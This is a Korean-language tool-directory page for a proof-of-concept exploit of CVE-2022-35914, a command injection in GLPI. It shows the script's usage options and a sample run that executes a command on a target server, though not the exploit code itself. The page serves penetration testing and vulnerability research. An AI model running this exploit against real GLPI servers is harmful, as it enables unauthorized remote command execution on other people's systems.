Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-35914-poc — CVE-2022-35914에 대한 개념 증명 익스플로잇으로, 타사 라이브러리 스크립트를 통한 GLPI의 명령 주입 취약점입니다. 취약한 GLPI 인스턴스에서 임의의 명령을 실행합니다. | Kitploit
도구/GitHubGitHub/cosad3s/cve-2022-35914-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubcosad3s/cve-2022-35914-poc

CVE-2022-35914-poc

CVE-2022-35914에 대한 개념 증명 익스플로잇으로, 타사 라이브러리 스크립트를 통한 GLPI의 명령 주입 취약점입니다. 취약한 GLPI 인스턴스에서 임의의 명령을 실행합니다.

저장소 보기
511112년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-35914 PoC

참조

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr

사용법

root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help            show this help message and exit
  -u URL                URL to test
  -c CMD                Command to launch
  -f HOOK               PHP hook function (default: exec)
  --check               Just check, no command execution.
  --user-agent USER_AGENT
                        Custom User-Agent

예제:

root@kitploit:~
❯ ./CVE-2022-35914.py -u http://glpi
[+] Command output (Return code: 0):
 uid=48(apache) gid=48(apache) groups=48(apache)
도구 다운로드